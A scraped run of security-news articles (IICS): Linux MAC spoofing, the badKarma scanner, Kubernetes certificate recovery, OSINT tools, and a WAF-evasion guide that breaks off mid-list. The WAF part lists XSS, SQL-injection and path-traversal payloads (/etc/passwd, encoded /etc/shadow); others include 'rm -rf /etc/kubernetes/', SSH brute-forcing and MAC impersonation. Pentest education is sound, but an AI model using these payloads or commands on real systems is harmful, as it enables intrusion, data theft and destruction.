Why change the MAC address?

The MAC address is (should be) unique to each network interface. By the way, if the device has several network interfaces, then each of them has its own MAC address. For example, laptops have at least two network interfaces: wired and Wi-Fi – each of them has an MAC address. Desktop computers are usually the same. When we talk about “changing  MAC addresses”, we need to understand that there are several of these addresses. By the way, each port has its own unique MAC address, if the device supports wireless networks, then each wireless interface (2.4 GHz and 5 GHz) also has its own MAC address.

So, since the MAC address must be unique, it allows you to uniquely identify the network device. And since this network device is part of your computer, this allows you to uniquely identify your computer. Moreover, the MAC address (also called a hardware, physical address) does not change when the operating system changes.

In short, the replacement of the MAC address is needed so that it is not possible to track and identify the device by the MAC address. But there is a more important reason (than paranoia) to learn about MAC addresses and about methods from substitution, or prohibiting changes in your system. Based on MAC addresses, user identification can be performed when connected via the Intercepting Portal. A few words about the Intercepting Portal. Captive Portal). This is a way to force the user to comply with certain conditions for providing Internet access. You can most often encounter examples of Intercepting Portals in public places that provide Internet access services via Wi-Fi to an indefinite circle of people, but who want to identify the user and / or allow access only to persons with credentials. For example, at the airport you may need to confirm your phone number via SMS to access the free Wi-Fi network. The hotel will provide you with a username and password for accessing the Internet via Wi-Fi – this ensures that only hotel customers can use Wi-Fi services. 

Due to the features of the Intercepting Portal, user identification is based on MAC addresses. And starting with NetworkManager 1.4.0 (a popular program for managing network connections on Linux), an automatic MAC-address spoofing is now present. And in case of incorrect settings, you may encounter an Internet access problem running through the Intercepting Portal. There are also problems with customized filtering by MAC on the router.

Well, for pentesting experts , of course, there are reasons to change the MAC address: for example, to pretend to be another user, and take advantage of its open access to the magical world of the Internet, or to increase anonymity.

Who can see my MAC address?

The MAC address is used to transfer data on a local network. That is, it is not transmitted when connecting to websites and when accessing the global network. Although there are exceptions: some vulnerabilities allow a person who is not on your local network to find out your MAC address.

If you connect to the router via the local network, then the router knows your MAC address, but if you open the site on the Internet, the site owner cannot find out your MAC address. 

All devices located on the local network can see each other’s MAC addresses (there are many scanners that can get this data). An example of a local network scan made using arp-scan. A slightly different situation with wireless network interfaces. If you are connected to an access point (router), then all the rules of the local network work: the router and other devices can find out your MAC address. But also any person who is within the reach of your Wi-Fi signal (from the phone, laptop) can find out your MAC address.

Spoofing MAC addresses in NetworkManager

NetworkManager may reassign MAC installed by other programs

Starting with NetworkManager 1.4.0, this program supports MAC spoofing, and has many different options.

So that we can understand them, we need to understand some concepts

First, network adapters are :

• wired (ethernet);
• wireless (wifi).

For each group, MAC rules are customized separately.

Secondly, a wireless adapter can be in two states:

• scanning (search, not connected to the network) – is set using the property wifi.scan-rand-mac-address, default set to yes, which means that during scanning it sets an arbitrary MAC address. Another acceptable value is no;
• connected to the network – installed using the property wifi.cloned-mac-address, the default value is preserve.

For wired interface (installed by property ethernet.cloned-mac-address) and the wireless interface in the connection state (installed by the property wifi.cloned-mac-address) the following values are available (regimes):

• clearly specified MAC address (t.e. you can write the desired value that will be assigned to the network interface)
• permanent: use the MAC address sewn into the device
• preserve: do not change the device’s MAC address after activation (for example, if the MAC has been changed by another program, the current address will be used)
• random: generate a random variable for each connection
• stable: similar to random – i.e. for each connection to generate a random variable, NO when connecting to the same network, the same value will be generated
• NULL / not installed: This is the default value that allows you to roll back to global settings by default. If global settings are not set, then NetworkManager rolls back to the value preserve.

If you are trying to change the MAC in other ways and you are failing, it is entirely possible that NetworkManager, which changes the MAC in its own rules, is to blame. Since most Linux distributions with a NetworkManager graphical interface are installed and running by default, to solve your problem, you must first understand how NetworkManager works and by what rules.

NetworkManager configuration files

NetworkManager settings, including settings related to MAC, can be done in a file /etc/NetworkManager/NetworkManager.conf or adding an additional file with the extension . . . .conf to the directory /etc/NetworkManager/conf.d 

The second option is highly recommended, since when updating NetworkManager usually replaces the main one . . . . . . . . . .conf file and if you made changes to /etc/NetworkManager/NetworkManager.conf, then the settings you made will be overwritten.

How to make Kali Linux replace with each connection

If you want the MAC address to be replaced with each connection, but the same MAC is used in the connection to the same network, then the file /etc/NetworkManager/conf.d/mac.conf:

sudo gedit /etc/NetworkManager/conf.d/mac.conf

Add lines :

[connection]
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable

Lines with ethernet.cloned-mac-address & wifi.cloned-mac-address can be added individually or together.

Check the current values :

ip link

Restart the service :

sudo systemctl restart NetworkManager

We will make connections to wired and wireless networks. Now check the values of MAC again 

As you can see, MAC is replaced for both the wired and wireless interfaces.

As already mentioned, the same addresses will be generated for the same networks, if you want different MACs each time even for the same networks, then the lines should look like this:

[connection]
ethernet.cloned-mac-address=random
wifi.cloned-mac-address=random

How to configure automatic MAC spoofing in Ubuntu and Linux Mint

Ubuntu and Linux Mint use NetworkManager versions that support automatic MAC configuration. However, if you connect a Wi-Fi card to Ubuntu or Linux Mint, you will see a real MAC. This is due to the fact that in the file /etc/NetworkManager/NetworkManager.conf indicated not to spoof :

To change this, open the file :

sudo gedit /etc/NetworkManager/NetworkManager.conf

And delete the lines :

[device]
wifi.scan-rand-mac-address=no

or comment on them to make it happen :

#[device]
#wifi.scan-rand-mac-address=no

or change no on yes:

[device]
wifi.scan-rand-mac-address=yes

And restart NetworkManager :

sudo systemctl restart NetworkManager

Similarly, you can add lines to replace MAC (these settings create a new address for each connection, but when connecting to the same networks, the same address is used):

[connection]
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable

Other Ways to change the MAC address

Change MAC using iproute2

We will use the program ip, which is included in the package iproute2.

Let’s start by checking the current MAC address with the command :

ip link show interface_name

Where Interface_name – This is the name of a particular network interface that you want to see. If you do not know the name, or want to see all the interfaces, then the command can be started like this :

ip link show

At the moment, we are interested in the part that follows after link / ether“and represents a 6-byte number. It will look something like this :

link/ether 00:c0:ca:96:cf:cb

The first step for spoofing MAC addresses is to transfer the interface to a state down. This is done by the team

sudo ip link set dev interface_name down

Where Interface_name replaces the real name. In my case, this wlan0, then the real team looks like this:

sudo ip link set dev wlan0 down

Next, we go directly to the MAC spoofing. You can use any hexadecimal value, but some networks may be configured not to assign IP addresses to customers whose MAC address does not match any known vendor (producer). In these cases, so that you can successfully connect to the network, use the MAC prefix of any real vendor (first three bytes) and use arbitrary values for the next three bytes.

To change the MAC, we need to run the command :

sudo ip link set dev interface_name address XX:XX:XX:XX:XX:XX

Where XX: XX: XX: XX: XX: XX – This is the desired new MAC .

For example, I want to set the hardware address EC: 9B: F3: 68: 68: 28 for my adapter, then the team looks like this:

sudo ip link set dev wlan0 address EC:9B:F3:68:68:28

In the last step, we return the interface to the state up. This can be done by a team of the form :

sudo ip link set dev interface_name up

For my system, a real team:

sudo ip link set dev wlan0 up

If you want to check if the MAC is really changed, just run the command again:

ip link show interface_name

Value after “link / ether“should be the one you installed.

Change MAC with macchanger

Another method uses macchanger (also known as the GNU MAC Changer). This program offers various functions, such as changing the address so that it matches a particular manufacturer, or its complete randomization.

Set macchanger – it is usually present in official repositories, and in Kali Linux it is installed by default.

At the time of the change of the MAC, the device should not be used (be connected in any way, or have status up). To transfer the interface to a state down:

sudo ip link set dev interface_name down

For spoofing, you need to specify the name of the interface, and replace in each next command wlan0 in the name of the interface that you want to change the MAC.

To find out the values of MAC, execute the command with the option -s:

sudo macchanger -s wlan0

Something like:

Current MAC:   00:c0:ca:96:cf:cb (ALFA, INC.)
Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

The “Current MAC” line means the address at the moment, and “Permanent MAC” means a constant (real) address.

For spoofing the MAC address to a completely arbitrary address (option -r):

sudo macchanger -r wlan0

About the following will be displayed :

Current MAC:   00:c0:ca:96:cf:cb (ALFA, INC.)
Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)
New MAC:   	be:f7:5a:e7:12:c2 (unknown)

The first two lines are already explained, the line “New MAC” means a new address.

For randomization, only bytes that determine the uniqueness of the device, the current MAC address (i.e.e. if you check the MAC address, it will register as from the same vendor) run the command (option -e):

sudo macchanger -e wlan0

To set the MAC address to a specific value, execute (option -m):

sudo macchanger -m XX:XX:XX:XX:XX:XX wlan0

Here XX: XX: XX: XX: XX: XX – This is the MAC you want to change to.

Finally, to return the MAC address to the original, constant value prescribed in the iron (option -p):

sudo macchanger -p wlan0

Conclusion

NetworkManager currently provides a wealth of MAC spoofing capabilities, including a change to a random address, or to a specific one. A feature of NetworkManager is the separation of “scanning” and “connected” modes, i.e. you may not see that the settings made have already entered into force until you connect to any network.

If after the change of MAC you have problems with connecting (you cannot connect to networks – wired or wireless), this means that there is a ban on connecting with MAC from an unknown vendor (producer). In this case, you need to use the first three octets (bytes) of any real vendor, the remaining three octets can be arbitrary says pentesting experts.

For Windows, we will soon write the article “how to change the MAC address on Windows”

The post How to easily spoof mac address automatically and be more anonymous appeared first on Information Security Newspaper | Hacking News.

This is usually a fairly typical set of actions that varies from running network services detected on the host. Therefore, there are already various automation tools that can scan the network range and, for example, start the bar-force of the services found.

We want to talk about another ethical hacking tool – this badKarma. This program has a graphical interface in which it is enough to click the mouse – it is not necessary to introduce commands (although they can be adjusted for fine tuning).

How to install badKarma

Installing badKarma is very simple. But the fact is that this is just a graphical shell for launching tools. That is, you need to install all the tools that the program uses. Therefore, I recommend working with badKarma in Kali Linux, in which (almost) everything you need is already present.

To install badKarma in Kali Linux, run the command :

sudo apt install python3-pip python3-gi phantomjs mitmproxy ffmpeg gir1.2-gtk-vnc-2.0 gir1.2-gtksource-3.0 gir1.2-vte-2.91 gir1.2-osmgpsmap-1.0 gir1.2-webkit2-4.0 knockpy ncat gobuster
git clone https://github.com/r3vn/badKarma.git
cd badKarma
sudo pip3 install -r requirements.txt
chmod +x badkarma.py
./badkarma.py

How to use badKarma

Start by entering the target. You can specify the site address, IP address or range of IP addresses :

You can also select a scan profile. The following options are available:

• nmap_default – normal scanning with help Nmap,
• nmap_intense_scan – intensive scanning with Nmap, the options -T4 -A -v -oX are used
• nmap_intense_scan_all_tcp – intensive scanning of all TCP ports with Nmap, options -p 1-65535 -T4 -A -v -oX are used
• nmap_intense_scan_no_ping – intensive scanning with Nmap without checking if the host is available (without ping), the options -T4 -A -v -Pn -oX are used
• masscan_full_tcp – full scan with help Masscan, options are used -p0-65535 –rate 10000 –banner
• get-from-shodan – do not scan, but get data from shodan. To do this, you must first specify your API key to shodan. In Kali Linux API, the key to shodan must be written in the ~ / filebin / badKarma / conf / shodan.conf. And in the BlackArch API, the key to shodan must be written in the file. /usr/share/badkarma/conf/shodan.conf

As a goal, I will add the local network through which I go online: 192.168.50.0 / 24

Scan results will be presented as a list of available hosts :

If you click on the host, open ports and running network services will be shown :

Under the list of running services is other additional information (if it is collected) about the operating system, location, MAC address and more :

Now we have two options: you can continue to explore the host as a whole, or focus on its individual services. To view the available options for working with the host, right-click on it :

Various types of scanning using Nmap, various options for finding subdomains, DNS record research, and other ways to get information on the host are available there.

By right-clicking on the services launched on the host, you can see the actions available for them :

For example, for SSH you can run brut-force :

You can start searching for exploits using nmap, searchesploit or splitus:

In this case, the exact version number of the service will be determined (if this has not been done previously) and exploits from popular databases will be searched for for it.

Especially many different options for web services :

You can take a screenshot, clone a page, scan popular programs for finding vulnerabilities, start searching for users, hosts, directories, subdomains, and more

has WebSession (works with mitmproxy):

The data obtained during operation are not only displayed, but also stored in the session file /tmp/badkarma.sqlite. If you want to save this file, then after the completion of the work, be sure to copy it to a safe place, since the folder. / tmp automatically cleansed at each computer reboot.

Conclusion

badKarma in general, an interesting pentesting program with which you can quickly perform routine actions and keep the results in one place convenient for visual perception. As you can understand when working with the program, the set of operations for each service is selected intellectually, depending on the type of service. If this list lacks some of your favorite tools, then this is not a problem: badKarma is a modular program and you can add your own module.

The post How to Use Advanced Network Intelligence Toolkit for Pentesting: badKarma appeared first on Information Security Newspaper | Hacking News.

The update considers any system storing personally identifiable information (PII) as critical equipment, making them subject to regular reviews and testing processes. Technology implementations interacting with critical operating and maintenance systems are also considered critical.

Entities providing investment services shall also maintain an updated inventory of their systems, including hardware, software, storage units, network resources and data flows. System administrators should perform frequent security audits, performed only by entities previously approved by CERT-In.

If that were not enough, all organizations that provide these services must submit their security reports within ten days after receiving this notification.

As many readers may guess, ten days is a ridiculously short deadline to achieve such goals, so it is anticipated that many organizations will try to challenge this decision of the Indian government.

Online platforms think this is mission impossible, especially considering that the deadline granted by the authorities includes two weekends.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Indian companies listed in stock exchange to provide infosec audits and information system inventory to government. New SEBI guidelines appeared first on Information Security Newspaper | Hacking News.

This time, cybersecurity awareness experts from the International Institute of Cyber Security (IICS) will show you the 10 search engines most used by cybersecurity professionals and even by some hacking groups.

As usual, we remind you that this article was written for informational purposes only and should not be taken as a call to action, so IICS is not responsible for the misuse of the information contained herein. With this in mind, let’s start looking at web browsers.

Shodan

Cybersecurity awareness experts consider Shodan to be one of the best search engines today. This tool allows getting information about any device connected to the Internet, including webcams, alarms, servers, routers, traffic lights and many other devices.

Shodan may collect information such as IP addresses, HTTP server headers, location, and device type, which can be used to find security flaws and fix them, or even exploit them.

Censys

Censys is a tool similar to Shodan in general terms as it also allows you to monitor devices connected to the Internet, collect their information and provide detailed reports to users.

According to cybersecurity awareness specialists, Censys can also be used to view real-time information about the various attacks to which computer systems are exposed, being able to detect services vulnerable to known failures.

Greynoise

Greynoise is somewhat different from the tools listed above, as it allows you to identify servers and users who scan networks for vulnerabilities using tools such as Shodan. Using this tool, it is possible to get information about malicious websites, types of attacks, and security breaches by simply entering an IP address or related words.

Wigle

This is a search engine for finding wireless networks and used to map wireless networks. Using this tool shows a map where we can enter a certain latitude and longitude in order to find all the networks of access points, WiFi devices and telecommunications antennas available in that area.

Zoomeye

Zoomeye is a navigation map to find vulnerabilities and active threats in networks and systems. It was developed mainly for the Chinese market and records numerous amounts of data collected from multiple sources, always ready for user consultation.

The tool can present statistics for all devices that can be accessed over the Internet from different countries, web browsers or servers.

Hunter

This is an internet search engine widely used by hacking groups to find unsecured email addresses. Hunter Search Engine can be used to search and retrieve all email addresses associated with a specific domain or organization.

During use, Hunter displays a list of email addresses that belong to the target domain, including their activity, as well as the public resources that were used for those addresses. The developers also created an API to test email ID deliverability and learn more about the organization.

PIPL

This is a useful Search Engine on the Internet to find information about a certain person, using as a reference general data associated with the person, such as phone numbers and email addresses, mention experts in cybersecurity awareness.

PublicWWW

This is a search engine designed to analyze any website for source code in HTML, CSS, JavaScript and other formats. Using PublicWWW, cybersecurity awareness experts can search websites based on their source code by simply providing a small piece of code; in response, the search engine will return a list of all websites that use similar code, which can prove very useful in subsequent analysis.

Have I Been Pwned

This tool is useful for both ethical hacking specialists and the general public, as it allows users to verify if an email address has been compromised in a cybersecurity incident.

The platform collects and identifies various database dumps and identifies exposed accounts, alerting the user to their compromised information or confirming that the email address or phone number is safe.

OSINT Framework

Open Source Intelligence Framework is capable of collecting information available from public sources, which is very useful for analysis and pentesting processes. This tool has a large number of menus and submenus, which allow you to obtain the desired results according to the goals of the research.

This cybersecurity framework is mainly employed by law enforcement and intelligence agencies in multiple countries, so it is constantly maintained and updated.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post TOP 10: The best web browsers for cybersecurity specialists appeared first on Information Security Newspaper | Hacking News.

On this occasion, pentesting experts from the International Institute of Cyber Security (IICS) will show you how to perform multiple hacking tasks on Kubernetes, including cluster disruption, certificate deletion, and node connection, all without downtime for the services being run.

Before continuing, as usual we remind you that this article was prepared for informational purposes only and should not be taken with a call to action. IICS is not responsible for the misuse of the information contained herein.

To get started, let’s remember that the main Kubernetes control panel consists of a few components:

• etcd: Used as a database
• kube-apiserver: API and heart of the cluster
• kube-controller-manager: For the deployment of operations on Kubernetes resources
• kube-scheduler: Main planner
• kubelets: To launch containers directly on hosts

Each of these components is protected by a set of TLS, client and server certificates, whose purpose is to authenticate and authorize components between them, mention pentesting experts. These resources are not stored anywhere in the Kubernetes database, except in certain cases, but are presented as normal files:

# tree /etc/kubernetes/pki/ /etc/kubernetes/pki/ ├── apiserver.crt ├── apiserver-etcd-client.crt ├── apiserver-etcd-client.key ├── apiserver.key ├── apiserver-kubelet-client.crt ├── apiserver-kubelet-client.key ├── ca.crt ├── ca.key ├── CTNCA.pem ├── etcd │ ├── ca.crt │ ├── ca.key │ ├── healthcheck-client.crt │ ├── healthcheck-client.key │ ├── peer.crt │ ├── peer.key │ ├── server.crt │ └── server.key ├── front-proxy-ca.crt ├── front-proxy-ca.key ├── front-proxy-client.crt ├── front-proxy-client.key ├── sa.key └── sa.pub

The components themselves are described and run on the masters as static pods from the /etc/kubernetes/manifests/ directory.

The most important thing is to know how to make a functional cluster of all this; let’s imagine that the Kubernetes components mentioned above somehow interact with each other. The basic diagram looks like this:

To communicate, they need TLS certificates, which, in principle, can be taken to a separate level of abstraction and completely rely on their distribution tool, be it kubeadm, kubespray or something else, pentesting experts mention. In this example, we’ll look at kubeadm because it’s the most common Kubernetes deployment tool and is often used as part of other solutions.

Let’s say we already have a cluster in place. Let’s start with the fun part:

rm -rf /etc/kubernetes/ 

In masters, this directory contains:

• A set of certificates and CAs for etcd (c/etc/kubernetes/pki/etcd)
• A set of certificates and CAs for Kubernetes (c/etc/kubernetes/pki)
• Kubeconfig for cluster-admin, kube-controller-manager, kube-Scheduler and kubelet (each also has a base64-coded CA certificate for our /etc/kubernetes/*.conf cluster)
• A set of static manifests for etcd, kube-apiserver, kube-Scheduler and kube-controller-manager (c/etc/kubernetes/manifests)

Suppose we lost everything at once.    

Fixing the control plane

To avoid confusion, the researchers recommend making sure that all of our control plane pods are also stopped:

crictl rm `crictl ps -aq`

It should be remembered that kubeadm, by default, does not overwrite existing certificates and kubeconfigs, so to reissue them; you must first manually delete them.

Let’s start by restoring etcd, because if we had a quorum (3 or more master nodes), the etcd cluster would not start without most of them present.

kubeadm init phase certs etcd-ca

The above command will generate a new CA for our etcd cluster. Since all other certificates must be signed by it, we will copy it along with the private key to the rest of the master nodes:

/etc/kubernetes/pki/etcd/ca.{key,crt}

Now, let’s regenerate the rest of the etcd certificates and static manifests on all nodes in the control plane:

kubeadm init phase certs etcd-healthcheck-client
kubeadm init phase certs etcd-peer
kubeadm init phase certs etcd-server
kubeadm init phase etcd local 

At this stage, we should already have an etcd cluster working, mention the experts in pentesting:

# crictl ps
CONTAINER ID        IMAGE               CREATED             STATE               NAME                ATTEMPT             POD ID
ac82b4ed5d83a       0369cf4303ffd       2 seconds ago       Running             etcd                0                   bc8b4d568751b

Now let’s do the same, but for Kubernetes, on one of the master nodes, run:

kubeadm init phase certs all
kubeadm init phase kubeconfig all
kubeadm init phase control-plane all
cp -f /etc/kubernetes/admin.conf ~/.kube/config 

The above commands will generate all SSL certificates for our Kubernetes cluster, as well as statistics for the manifests and kubeconfigs for Kubernetes services. If you are using kubeadm to join kubeletes, you will also need to update the cluster information configuration in the kube-public namespace that still contains the hash of your old CA.

kubeadm init phase bootstrap-token  

Since all certificates from other instances must also be signed by a CA, copy them to the other nodes in the control plane and repeat the above commands on each of them, pentesting experts recommend.

/etc/kubernetes/pki/{ca,front-proxy-ca}.{key,crt}
/etc/kubernetes/pki/sa.{key,pub}  

As an alternative to manual copying certificates, you can now use the Kubernetes interface, for example, the following command:

kubeadm init phase upload-certs --upload-certs

Certificates will then be encrypted and uploaded to Kubernetes for 2 hours, so you can rejoin the masters as follows:

kubeadm join phase control-plane-prepare all kubernetes-apiserver:6443 --control-plane --token cs0etm.ua7fbmwuf1jz946l     --discovery-token-ca-cert-hash sha256:555f6ececd4721fed0269d27a5c7f1c6d7ef4614157a18e56ed9a1fd031a3ab8 --certificate-key 385655ee0ab98d2441ba8038b4e8d03184df1806733eac131511891d1096be73
kubeadm join phase control-plane-join all

It’s worth noting that the Kubernetes API has another configuration that stores the CA certificate for the front proxy client, used to authenticate apiserver requests to webhooks and other aggregation layer services. Fortunately, kube-apiserver updates it automatically. However, you may want to manually clean it from the old certificates:

kubectl get cm -n kube-system extension-apiserver-authentication -o yaml

In any case, at this stage we already have a fully functioning control plane.

Fixing the workers

This command will list all the nodes in the cluster, although they will now all be in the NotReady state:

kubectl get node

This happens because they are still using the old certificates and waiting for server requests signed by the old CA. To work around this issue, we’ll use kubeadm and create a logging node in the cluster.

When both teachers have access to the CA and can connect locally:

systemctl stop kubelet
rm -rf /var/lib/kubelet/pki/ /etc/kubernetes/kubelet.conf
kubeadm init phase kubeconfig kubelet
kubeadm init phase kubelet-start 

Then, for the union workers, we will generate a new token:

kubeadm token create --print-join-command

And in each of them we execute:

systemctl stop kubelet
rm -rf /var/lib/kubelet/pki/ /etc/kubernetes/pki/ /etc/kubernetes/kubelet.conf 
kubeadm join phase kubelet-start kubernetes-apiserver:6443  --token cs0etm.ua7fbmwuf1jz946l     --discovery-token-ca-cert-hash sha256:555f6ececd4721fed0269d27a5c7f1c6d7ef4614157a18e56ed9a1fd031a3ab8

Attention: /etc/kubernetes/pki/ it is not necessary to delete the directory in the masters, since it contains all the necessary certificates, say the experts in pentesting.

The previous procedure will reconnect all your cublets to the cluster without affecting the containers that are already running on them. However, if you have many nodes in the cluster and you are doing this at the same time, you might have a situation where Controller-Manager starts recreating containers with NotReady nodes and tries to start them on the active nodes in the cluster.

To avoid this, we can temporarily stop the controller-administrator, on the masters:

rm /etc/kubernetes/manifests/kube-controller-manager.yaml
crictl rmp `crictl ps --name kube-controller-manager -q` 

The last command is only necessary to make sure that the controller-administrator is not actually running. Once all the nodes in the cluster are connected, we can generate a static manifest for the back of the controller-administrator.

To do this, in all teachers they will have to execute:

kubeadm init phase control-plane controller-manager

Note that you need to do this at the stage where you have already generated the join token; otherwise, the connection operation will crash when trying to read the cluster-info token.

If the kubelet is configured to receive a certificate signed by your CA (optional TLSBootstrap server: true), you will also need to reconfirm the csr of your kubelets:

kubectl get csr
kubectl certificate approve <csr> 

Fixing ServiceAccounts

There is one more thing. Since we lost /etc/kubernetes/pki/sa.key, pentesting experts mention that this is the same key that signed the jwt tokens for all our ServiceAccounts, so we need to recreate the tokens for each of them.

This can be done by simply removing the token field from all secrets as kubernetes.io/service-account-token:

kubectl get secret --all-namespaces | awk '/kubernetes.io\/service-account-token/ { print "kubectl patch secret -n " $1 " " $2 " -p {\\\"data\\\":{\\\"token\\\":null}}"}' | sh –x 

After that, kube-controller-manager will automatically generate new tokens signed with a new key, pentesting experts mention. Unfortunately, not all microservices can re-read the token on the fly, and you’ll most likely need to manually restart the containers where they’re used:

kubectl get pod --field-selector 'spec.serviceAccountName!=default' --no-headers --all-namespaces | awk '{print "kubectl delete pod -n " $1 " " $2 " --wait=false --grace-period=0"}' 

For example, this command will generate a list of commands to delete all modules using a non-standard service account. I recommend starting with the kube system namespace. You have kube-proxy and the CNI plugin installed, which are vital for configuring your microservices to communicate.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to perform Kubernetes pentesting and secure it? appeared first on Information Security Newspaper | Hacking News.

According to the specialists of the International Institute of Cyber Security (IICS), one of the most recent security threats is related to IoT devices, as malicious hacking groups have realized that these computers do not have the best security measures, which makes them easy and perfectly usable targets for the launch of other subsequent attacks, including botnet use, malware distribution, and denial of service (DoS) attacks.

The ease with which these attacks are launched has forced the cybersecurity community and pentesting specialists to find the best ways to prevent the compromise of these devices, something especially complicated considering the variety of IoT infrastructures, operating systems and firmware versions. However, there are options to strengthen the security of these networks in a practical way.

IoT-PT is a virtual machine for pentesting specially designed for IoT devices, composed of exploitation frameworks for IoT and Bluetooth hacking tools, reverse engineering firmware (automated and dynamic), iOS application analysis / APK and network security tools. This tool is available at GitHub.

According to pentesting experts, the following list shows all the tools included in IoT-PT:

 Before concluding, we remind you that this article was prepared for informational purposes and should not be taken as a call to action. IICS is not responsible for the misuse that may occur to the information contained herein. Remember that pentesting must be deployed for legitimate purposes and with the prior consent of the administrators of the analyzed system.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to do penetration testing of IoT devices easily appeared first on Information Security Newspaper | Hacking News.

• Find, verify, and combine vulnerabilities in an efficient way
• Have more time to investigate complex vulnerabilities such as business logic, architectural flaws, or virtual hosting sessions
• Demonstrate a true impact despite the short periods of time normally given to test vulnerabilities

The tool is highly customizable and anyone can create simple plugins or add new tests in the configuration files without having development experience. Nonetheless, this tool is not a full security solution and will only be as good as the pentester using it, as it will require understanding and experience to correctly interpret the result of the tool and decide what to investigate further to demonstrate the impact.

According to pentesting specialists, OWTF main features include:

• Resiliency: If a tool happens to fail, OWTF will move to the next tool/test, saving the partial output of the tool until it crashes
• Test Separation: OWTF separates your traffic to the destination into mainly 3 types of plugins
  • Passive: There is no traffic heading to the target
  • Semi passive : normal traffic to the target
  • Active : vulnerability direct probe
• Web Interface: Easily manage high-penetration interactions
• Interactive reports
• Automated classifications of add-ons from the output of the tool, fully configurable by the user
• Configurable risk classifications

The tool is available through the official OWASP platforms.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post OWTF penetration testing framework combines OWASP Top 10, PTES and NIST appeared first on Information Security Newspaper | Hacking News.

Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.

A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. The WAF compromise allows researchers (and also hackers) to know what’s behind these implementations.

Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants to these solutions, primarily by delivering malicious payloads disguised as legitimate software.

On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.

HOW TO DETECT A WAF?

There is a general process for finding the actual IP of a target website:

• Employ shodan.io or censys.io
• Search SPF records and TXT records
• SPF and TXT records can be the IP address of the entry point without CloudFlare
• You can also view securitytrails.com in historical data that can show the original IP in old records

To check if a WAF is configured correctly, pentesting experts recommend relying on the following indicators:

• A WAF uses standard ports 80, 443, 8000, 8008, 8080, and 8088
• A WAF sets its own cookies on requests
• A WAF is associated with individual headers
• A WAF responds with unique response codes to malicious requests

To verify the proper configuration of these devices, experts can:

• Send a standard GET request from the browser, intercept and write the response headers
• Send a request from the command line (such as cURL) and then verify the content and headers of the response
• Send GET requests to random open ports and search for banners that can reveal the WAF provider
• Try some SQL injection payloads like: “o1 =1 – to try to log in
• Use XSS payloads such as <script>confirm() </script>in some input fields
• Add .. /.. /.. /etc/passwd to the random parameter in the URL
• Add some payload like ‘OR SLEEP(5)OR’ to the end of URLs for any random parameters
• Send GET requests with legacy protocols such as HTTP/0.9 (HTTP/0.9 does not support POST requests)
• Check the server header to see the different types of interactions      
• Send the raw generated FIN &RST packet to the server and define the response

WAF HACKING TOOLS

Most hackers use automated tools to speed up web application firewall evasion processes. Below is a small list of the most popular tools for these activities; its use is only the first step in verifying how much information an attacker will be able to access.

• w3af: A framework for auditing and attacking web applications
• wafw00f: Tool to find digital logging and WAF authentication
• BypassWAF: Used to evade these security mechanisms using DNS history. this tool will search for old dns records and check if the server is responding for this domain
• CloudFail: A tactical recognition tool that attempts to find the original IP address behind Cloudflare’s WAF

There are many other tools, but pentesting experts claim that these are the most popular.

WAF EVASION

Below we will review some of the best known WAF bypassing techniques.

Case switch technique

It consists of the combination of uppercase and lowercase characters.

Basic request payload:

<ScrIpT>confirm()</sCRiPt>

Bypassing technique:

<ScrIpT>confirm()</sCRiPt>

Basic request:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'

Bypassing technique:

sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'

Example in URL:

http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL encoding technique

Pentesting experts can also modify a normal payload with %encoding/ URL. For this technique you can use Burp Suite, which has a built-in coding and decoding tool.

WAF-blocked payload:

<Svg/x=">"/OnLoAD=confirm()/

Bypassing technique:

%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

WAF-blocked payload:

UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)

Bypassing technique:

UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

Example in URL:

https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode technique

ASCII characters provide us with excellent solutions to evade a WAF. Encode the entire payload or just one fragment for satisfactory results.

Basic request:

<check onstart=prompt()>

Obfuscation:

<check onstart=pru06fmpt() >

WAF-blocked code:

/?redir=http://google.com

Bypassing technique:

/?redir=http://google。 com (Unicode)

WAF-blocked code:

<check loop=1 onfinish=alert()>x

Bypassing technique:

<check loop=1 onfinish=alert(1)>x (Unicode)

Basic request:

.. /.. /etc/shadow

Obfuscation:

%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML presentation

According to pentesting experts, web applications encode special characters in HTML; encoding and rendering, respectively basic cross-sectional cases with numeric and general HTML encoding.

Basic request:

"><img src=x onerror=confirm()>

Encoded payload:

"><img src=x onerror=confirm()>

Encoded payload:

"><img src=x onerror=confirm()>

Mixed coding techniques

These rules tend to filter a particular type of encoding. These filters can be omitted using the combined encoding payload, using new lines and tabs and increased obfuscation.

Obfuscated payload:

<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>

Comment technique

Sometimes hackers often hide standard payload vectors in code comments, pentesting experts mention. Different payloads have different obfuscation methods.

WAF-blocked code:

<script>confirm()</script>

WAF Evasion:

<!--><script>confirm/**/()/**/</script>

WAF-blocked code:

/?id=1+union+select+1,2—

WAF Evasion:

/?id=1+un/**/ion+sel/**/ect+1,2—

